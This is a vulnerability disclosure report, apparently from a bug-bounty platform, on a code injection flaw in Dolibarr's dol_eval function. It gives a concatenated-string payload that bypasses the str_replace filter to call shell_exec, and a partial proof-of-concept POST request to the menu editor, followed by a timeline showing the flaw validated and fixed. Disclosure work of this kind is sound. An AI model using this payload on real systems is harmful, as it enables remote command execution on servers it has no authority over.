Code Injection in dolibarr/dolibarr


Reported on

Feb 28th 2022


Improper php function sanitization, lead to an ability to inject arbitrary PHP code and run arbitrary commands on file system. In the function "dol_eval" in file "dolibarr/htdocs/core/lib/functions.lib.php" dangerous PHP functions are sanitized using "str_replace" and can be bypassed using following code in $s parameter

('she'.'ll_'.'ex'.'ec')('<ANY SYSTEM SHELL COMMAND HERE>')

Proof of Concept

User with rights to add menus to the system can exploit this vulnerabilty with the following request

POST /htdocs/admin/menus/edit.php?action=add&token=84da28fc90b6abc2238f2e0da2e5ee10&menuId=0 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Cookie: <COOKIE>
Upgrade-Insecure-Requests: 1



This vulnerability is capable of run arbitrary commands in the file system

We are processing your report and will contact the dolibarr team within 24 hours. 3 months ago
We have contacted a member of the dolibarr team and are waiting to hear back 3 months ago
Laurent Destailleur validated this vulnerability 3 months ago
d3addog has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on 2a48dd 3 months ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation